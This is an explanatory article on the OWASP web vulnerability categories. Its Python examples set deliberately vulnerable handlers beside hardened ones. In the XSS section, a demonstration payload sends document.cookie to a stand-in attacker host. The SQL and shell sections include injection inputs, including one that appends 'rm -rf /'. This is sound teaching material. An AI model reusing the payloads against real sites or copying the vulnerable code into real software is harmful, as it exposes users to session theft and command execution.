The Open Web Application Security Project (OWASP) lists the security problems that do the most harm to Web applications: unverified parameters, access control defects, account and session management defects, cross-site scripting, buffer overflows, command injection, error handling problems, remote management vulnerabilities, and improper configuration of Web servers and application servers.
1) Unverified Parameters
Information carried in a Web request is passed to the application without being validated. An attacker can craft any part of the request, including the URL, the query string, the Cookie header, form fields, and parameters that are passed implicitly (hidden fields, values the page itself filled in), and use them to attack the components that process the request.
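As an added example (not code from the original page), the following Python shows the classic form of this defect, a checkout handler that totals the order from a hidden price field the browser sent, beside a handler that validates every parameter against a server-side rule and takes the price from server-side state. CATALOG, MAX_QTY, the form dictionaries and the function names are hypothetical stand-ins for a real application.

```python
# Unverified parameters: trusting a hidden form field, beside validating
# every parameter and ignoring client-supplied values the server already
# knows. Added example; CATALOG, MAX_QTY and the forms are hypothetical.
import re

CATALOG = {"book": 1200, "pen": 150}   # hypothetical prices, in cents
MAX_QTY = 100
QTY_PATTERN = re.compile(r"[0-9]{1,3}")  # ASCII digits only; str.isdigit() also
                                         # accepts characters int() rejects


class InvalidParameter(ValueError):
    """Raised when a request parameter fails validation."""


def checkout_vulnerable(form):
    """Totals the order from whatever the browser sent, including the
    hidden 'price' field. Editing that field (or the equivalent cookie
    or query-string value) lets the client set its own price."""
    return int(form["price"]) * int(form["qty"])


def checkout_hardened(form):
    """Validates each field against a server-side rule and never reads a
    client-supplied value the server already knows (the price)."""
    item = form.get("item")
    if item not in CATALOG:                      # allowlist of known items
        raise InvalidParameter("unknown item")
    qty_raw = form.get("qty", "")
    if not QTY_PATTERN.fullmatch(qty_raw):       # type check before int()
        raise InvalidParameter("qty must be a positive integer")
    qty = int(qty_raw)
    if not 1 <= qty <= MAX_QTY:                  # range check
        raise InvalidParameter("qty out of range")
    return CATALOG[item] * qty                   # price comes from the catalog


def is_rejected(form):
    """True if the hardened handler refuses the form."""
    try:
        checkout_hardened(form)
    except InvalidParameter:
        return True
    return False


# Constructed requests: the form as the page submits it, and the same
# form with the hidden price edited down to one cent.
HONEST_FORM = {"item": "book", "price": "1200", "qty": "2"}
TAMPERED_FORM = {"item": "book", "price": "1", "qty": "2"}

if __name__ == "__main__":
    print(checkout_vulnerable(HONEST_FORM), checkout_vulnerable(TAMPERED_FORM))
    print(checkout_hardened(HONEST_FORM), checkout_hardened(TAMPERED_FORM))
    print(is_rejected({"item": "book", "qty": "-1"}))
```

The hardened handler treats every field the same way: it decides what the value may look like (an allowlist of items, a digit-only quantity within a range) and rejects anything else, rather than trying to recognise bad input. A value the server can compute or look up itself, such as the price, is never accepted from the client at all.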
2) Access Control Defects
Restrictions on what an authenticated user is allowed to do are not enforced, so a user can act on data and functions that are not theirs. An attacker can exploit this to access other users' accounts, browse sensitive files, delete or modify content, perform unauthorized operations, or even obtain site administrator privileges.
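The following Python is an added example, not code from the original page: an account lookup that only checks that someone is logged in (so any user can read any account by changing the id in the URL), beside one that authorizes each object access against the server-side session. ACCOUNTS, the session dictionaries and the function names are constructed for the demonstration.

```python
# Access control defects: authentication without authorization, beside an
# object-level check on every read and write. Added example; ACCOUNTS,
# the sessions and the function names are constructed.

# Constructed data: account id -> owner and balance (cents).
ACCOUNTS = {
    101: {"owner": "alice", "balance": 5000},
    102: {"owner": "bob", "balance": 120},
}

# Constructed server-side sessions; the role lives here, never in the request.
ALICE = {"user": "alice", "role": "user"}
BOB = {"user": "bob", "role": "user"}
CAROL = {"user": "carol", "role": "admin"}


class Forbidden(PermissionError):
    """Raised when the caller may not act on the requested object."""


def get_account_vulnerable(session, account_id):
    """Checks only that someone is logged in. A user who changes the id in
    the URL (/account?id=102 -> id=101) reads another user's account."""
    if session is None:
        raise Forbidden("login required")
    return ACCOUNTS[account_id]


def get_account_hardened(session, account_id):
    """Authorizes the specific object: the caller must own it or hold the
    admin role, as recorded in the server-side session."""
    if session is None:
        raise Forbidden("login required")
    account = ACCOUNTS.get(account_id)
    allowed = account is not None and (
        account["owner"] == session["user"] or session.get("role") == "admin")
    if not allowed:
        # Same error for "missing" and "not yours", so ids cannot be enumerated.
        raise Forbidden("no such account")
    return account


def withdraw_hardened(session, account_id, amount):
    """Writes go through the same object check as reads."""
    account = get_account_hardened(session, account_id)
    if not 0 < amount <= account["balance"]:
        raise ValueError("invalid amount")
    account["balance"] -= amount
    return account["balance"]


def can_access(session, account_id):
    """True if the hardened check lets this session read the account."""
    try:
        get_account_hardened(session, account_id)
    except Forbidden:
        return False
    return True


if __name__ == "__main__":
    print(get_account_vulnerable(BOB, 101))          # bob reads alice's account
    print(can_access(BOB, 101), can_access(ALICE, 101), can_access(CAROL, 101))
```

The check is made on every object and every operation, using only what the server recorded at login; a role or owner name that arrives in the request is just another unverified parameter.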
3) Account and Session Management Defects
Account credentials and session tokens are not adequately protected. An attacker who obtains a password, a session cookie, or another token can bypass the permission restrictions placed on users and impersonate another user, inheriting the trust that user has.
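As an added example (not the page's own code), the Python below contrasts a predictable session id with a small session store that issues random tokens, stores only their hashes, expires them, and replaces them at login. SESSIONS, SESSION_TTL and the function names are hypothetical; the optional "now" argument stands in for the clock so the behaviour can be checked offline.

```python
# Account and session management: a guessable session id beside random
# tokens with hashed storage, expiry, rotation and server-side logout.
# Added example; SESSIONS, SESSION_TTL and the helpers are hypothetical.
import hashlib
import secrets
import time

SESSION_TTL = 900            # hypothetical idle timeout, in seconds
SESSIONS = {}                # sha256(token) -> {"user": ..., "expires": ...}


def weak_session_id(user, now):
    """The defect: an id derived from public inputs. Anyone who knows the
    username and roughly when the login happened can recompute it; the
    hash does not help because its inputs are guessable."""
    return hashlib.sha256(f"{user}:{int(now)}".encode()).hexdigest()


def _key(token):
    """Only a hash of the token is stored, so a leaked session table does
    not hand out live sessions."""
    return hashlib.sha256(token.encode()).hexdigest()


def create_session(user, now=None):
    """Issues a fresh 256-bit token from the OS CSPRNG (not random.random())."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    SESSIONS[_key(token)] = {"user": user, "expires": now + SESSION_TTL}
    return token


def set_cookie_header(token):
    """Secure keeps the token off cleartext HTTP, HttpOnly keeps it away from
    page scripts (limits what an XSS bug can steal), SameSite limits
    cross-site sending."""
    return (f"Set-Cookie: session={token}; Secure; HttpOnly; SameSite=Lax; "
            f"Path=/; Max-Age={SESSION_TTL}")


def lookup_session(token, now=None):
    """Returns the user for a live token, or None. Expired entries are
    dropped; a live one gets its idle timer reset."""
    now = time.time() if now is None else now
    key = _key(token)
    entry = SESSIONS.get(key)
    if entry is None:
        return None
    if entry["expires"] < now:
        del SESSIONS[key]
        return None
    entry["expires"] = now + SESSION_TTL
    return entry["user"]


def rotate_session(old_token, user, now=None):
    """Run at login: the pre-login token, which an attacker may have planted
    (session fixation), is discarded and a fresh one issued."""
    SESSIONS.pop(_key(old_token), None)
    return create_session(user, now)


def destroy_session(token):
    """Server-side logout. Clearing the cookie alone leaves the token valid."""
    return SESSIONS.pop(_key(token), None) is not None


if __name__ == "__main__":
    anon = create_session("anonymous", now=0)
    tok = rotate_session(anon, "alice", now=0)
    print(set_cookie_header(tok))
    print(lookup_session(anon, now=1), lookup_session(tok, now=1))
```

The token never encodes anything about the user; all meaning lives in the server-side entry, which is why the same design also supports forced logout and expiry.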
4) Cross-Site Scripting Vulnerability
The application embeds attacker-supplied content in the HTML of a page it serves. The user trusts the page because it comes from a site they trust, but when the browser renders the page, the script embedded in it is interpreted and executed in the user's browser with that site's privileges, so it can read the site's cookies and act as the user.
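The Python below is an added example, not from the original page. It shows a page that reflects a user-supplied name into HTML unchanged, beside output encoding chosen per context (HTML text, URL attribute, inline script), since an encoder for one context does not protect another. The fragments, function names and the attack payloads are constructed for the demonstration.

```python
# Cross-site scripting: reflecting input unchanged, beside context-specific
# output encoding. Added example; fragments and payloads are constructed.
import html
import json
from urllib.parse import quote


def greeting_vulnerable(name):
    """Whatever the user submitted becomes markup the victim's browser runs."""
    return f"<p>Hello, {name}!</p>"


def greeting_hardened(name):
    """HTML-encodes & < > " and ' so the input is displayed, not parsed."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def profile_link_hardened(username):
    """Two contexts in one fragment, two encoders: percent-encoding inside
    the href, HTML-encoding in the link text. Using one encoder for both
    would leave one of the contexts injectable."""
    return (f'<a href="/users/{quote(username, safe="")}">'
            f'{html.escape(username, quote=True)}</a>')


def inline_script_hardened(value):
    """Inside <script>, HTML entities are not decoded, so html.escape is the
    wrong tool. JSON-encode the value and also escape '<' so the literal can
    never contain '</script>' and close the tag early."""
    encoded = json.dumps(value).replace("<", "\\u003c")
    return f"<script>var user = {encoded};</script>"


# Constructed attack inputs: reflected script that steals the cookie,
# attribute break-out, and script-tag break-out.
PAYLOAD_SCRIPT = ("<script>new Image().src='http://attacker.example/?c='"
                  "+document.cookie</script>")
PAYLOAD_ATTR = 'x"><img src=x onerror=alert(1)>'
PAYLOAD_JS = "</script><script>alert(1)</script>"

if __name__ == "__main__":
    print(greeting_vulnerable(PAYLOAD_SCRIPT))
    print(greeting_hardened(PAYLOAD_SCRIPT))
    print(profile_link_hardened(PAYLOAD_ATTR))
    print(inline_script_hardened(PAYLOAD_JS))
```

Encoding is applied at the point of output, where the context is known, rather than at input time; the same username is encoded differently in the href and in the link text of one line.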
5) Buffer Overflow
Web application components that do not check the length of input data can be made to write past the end of a buffer. An attacker can use this to run carefully crafted code and take control of the process. Components that may be affected include CGI programs, libraries, drivers, and the Web server itself.
6) Command Injection Vulnerability
When a Web application passes parameters to an external system or to the local operating system, an attacker who can embed commands in those parameters may get the external system to execute them. SQL injection is one example: the attacker places SQL syntax in a form field or in the page's query string so that the server executes the attacker's SQL along with its own. The defence is to pass data separately from the command (parameterized queries, argument lists rather than a shell command line) and to validate the data against what the external system expects.
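As an added example (not the page's code), the Python below shows both forms of the defect and their fixes: a login query built by string concatenation beside a parameterized one, and an external command built as a shell line beside one passed as an argument list with the value validated first. The users table, the echo-based "external command" (which assumes a POSIX shell and an echo binary) and the sample inputs are constructed; ping is never actually run.

```python
# Command injection: SQL and shell commands built from input text, beside
# parameterized queries, argument lists and allowlist validation.
# Added example; the table, inputs and helper names are constructed.
import re
import sqlite3
import subprocess


def make_db():
    """Constructed in-memory table with two users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return db


def login_vulnerable(db, name, password):
    """Pastes the input into the SQL text; a quote in the input changes
    the statement's structure (e.g. name = "alice' --")."""
    sql = (f"SELECT name FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(db, name, password):
    """Sends the statement and the values separately; the values are never
    parsed as SQL, whatever they contain."""
    row = db.execute("SELECT name FROM users WHERE name = ? AND password = ?",
                     (name, password)).fetchone()
    return row[0] if row else None


def run_vulnerable(text):
    """Builds a shell command line from user text: ';' starts a second command."""
    return subprocess.run(f"echo {text}", shell=True,
                          capture_output=True, text=True).stdout


def run_hardened(text):
    """Passes the text as one argv element; no shell ever parses it."""
    return subprocess.run(["echo", text], capture_output=True, text=True).stdout


HOSTNAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def is_valid_host(host):
    """Allowlist pattern: letters, digits, dots, hyphens; no leading '-'."""
    return isinstance(host, str) and HOSTNAME.fullmatch(host) is not None


def ping_argv(host):
    """An argument list stops shell injection but not argument injection
    (a host of '-f' becomes a flag), so the value is validated first."""
    if not is_valid_host(host):
        raise ValueError("invalid hostname")
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "alice' --", "wrong"))       # alice
    print(login_parameterized(db, "alice' --", "wrong"))    # None
    print(repr(run_vulnerable("hello; echo INJECTED")))
    print(repr(run_hardened("hello; echo INJECTED")))
    print(ping_argv("example.com"), is_valid_host("example.com; rm -rf /"))
```

Parameterization and argument lists keep data out of the command parser; validation is still needed because the receiving program has its own parser for its arguments.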
7) Error Handling Problems
Error conditions such as running out of memory, failed system calls, network timeouts, and unavailable servers arise in normal operation. If the application does not handle them properly, an attacker can deliberately provoke conditions it cannot handle and learn about the system from the responses. For example, an attacker probing whether a file exists on the server can distinguish "file not found" (the file does not exist) from "access denied" (the file exists but the attacker may not read it).
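The Python below is an added example, not from the original page. It shows a file-serving handler whose error messages tell the client whether a file exists, beside one that returns the same response for every failure the client caused, a generic response for unexpected errors, and keeps the detail in a server-side log. FILES (a dictionary standing in for the document root and its permissions), LOG and the handler names are constructed.

```python
# Error handling: error messages that act as an existence oracle, beside
# uniform responses with the detail logged server-side. Added example;
# FILES, LOG and the handler names are constructed.
import os
import traceback

# Constructed "document root": name -> (who may read it, content).
FILES = {
    "public.txt": ("everyone", b"hello"),
    "secret.txt": ("admin", b"the plan"),
}
LOG = []                     # server-side log lines, never sent to clients


def serve_vulnerable(user, path):
    """Three distinguishable responses: found / exists but denied / missing,
    so a probe learns which names exist even without reading them."""
    if path not in FILES:
        return 404, "file not found"
    allowed, content = FILES[path]
    if allowed != "everyone" and allowed != user:
        return 403, "access denied"
    return 200, content


def serve_hardened(user, path):
    """One response for every failure the client caused, one generic
    response for anything unexpected; the real reason goes to the log."""
    try:
        name = os.path.normpath(path)
        entry = FILES.get(name)
        if entry is None:
            LOG.append(f"{user} {path!r}: no such file")
            return 404, "not found"
        allowed, content = entry
        if allowed != "everyone" and allowed != user:
            LOG.append(f"{user} {path!r}: exists, owner {allowed}")
            return 404, "not found"
        return 200, content
    except Exception:
        # Stack trace and exception text stay in the log, not in the response.
        LOG.append(f"{user} {path!r}: {traceback.format_exc()}")
        return 500, "internal error"


def probe(handler, user, paths):
    """What an attacker sees: the response for each probed name."""
    return {p: handler(user, p) for p in paths}


if __name__ == "__main__":
    names = ["public.txt", "secret.txt", "missing.txt"]
    print(probe(serve_vulnerable, "guest", names))
    print(probe(serve_hardened, "guest", names))
    print(serve_hardened("guest", None))
    print("\n".join(LOG))
```

The hardened handler still records everything an operator needs; it only stops the response from being the channel that carries it.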
8) Remote Management Vulnerabilities
Many Web applications let administrators manage the site remotely through a Web interface. If that management interface does not properly authenticate and authorize visitors, an attacker can obtain full control of the site through it.
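As an added example (not the page's code), the Python below contrasts a management handler that accepts a flag the client sends with a route registry in which every management handler is wrapped in a server-side session and role check by construction, so a route cannot be registered without it. SESSIONS, ADMIN_ROUTES, the request dictionaries and the handler names are hypothetical.

```python
# Remote management: trusting a client-supplied admin flag, beside a
# deny-by-default registry that puts a session-and-role check in front of
# every management route. Added example; all names are hypothetical.
import functools

# Constructed server-side session store: cookie value -> identity.
SESSIONS = {
    "tok-alice": {"user": "alice", "role": "admin"},
    "tok-bob": {"user": "bob", "role": "user"},
}


class Unauthorized(Exception):
    """Raised when a management request carries no valid admin session."""


def delete_user_vulnerable(request):
    """Authenticates with a value the client chose: ?admin=1 in the URL
    (a cookie 'isadmin=true' or a hidden field would be the same defect)."""
    if request["params"].get("admin") != "1":
        raise Unauthorized("admin flag missing")
    return f"deleted {request['params']['user']}"


ADMIN_ROUTES = {}


def admin_route(path):
    """Registers a management handler. The check is applied here, so a
    handler cannot be reachable without it."""
    def register(handler):
        @functools.wraps(handler)
        def guarded(request):
            session = SESSIONS.get(request.get("cookies", {}).get("session"))
            if session is None:
                raise Unauthorized("login required")
            if session["role"] != "admin":
                raise Unauthorized("admin role required")
            return handler(request, session)
        ADMIN_ROUTES[path] = guarded
        return guarded
    return register


@admin_route("/admin/delete_user")
def delete_user(request, session):
    """Receives the verified session, never a role from the request."""
    return f"{session['user']} deleted {request['params']['user']}"


def dispatch(path, request):
    """Routes a management request; unknown paths are refused."""
    handler = ADMIN_ROUTES.get(path)
    if handler is None:
        raise Unauthorized("no such management route")
    return handler(request)


def outcome(fn, *args):
    """Result string or the refusal reason, for comparing the two designs."""
    try:
        return fn(*args)
    except Unauthorized as exc:
        return f"refused: {exc}"


# Constructed requests: bob, an ordinary user who added ?admin=1 himself;
# alice, a real administrator; and a visitor with no session at all.
BOB_REQUEST = {"cookies": {"session": "tok-bob"},
               "params": {"admin": "1", "user": "alice"}}
ALICE_REQUEST = {"cookies": {"session": "tok-alice"}, "params": {"user": "bob"}}
ANON_REQUEST = {"cookies": {}, "params": {"admin": "1", "user": "alice"}}

if __name__ == "__main__":
    for req in (BOB_REQUEST, ANON_REQUEST, ALICE_REQUEST):
        print(outcome(delete_user_vulnerable, req),
              "|", outcome(dispatch, "/admin/delete_user", req))
```

Putting the check in the registration step rather than in each handler makes the safe behaviour the default; a forgotten check is then a missing decorator, which also makes the route unreachable.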
9) Improper configuration of Web servers and application servers
A securely configured server is essential to a Web application, and server configuration is complex. For example, an Apache configuration file consists of directives and comments, and a directive may take several parameters. A mistake in the configuration can have a large impact on security.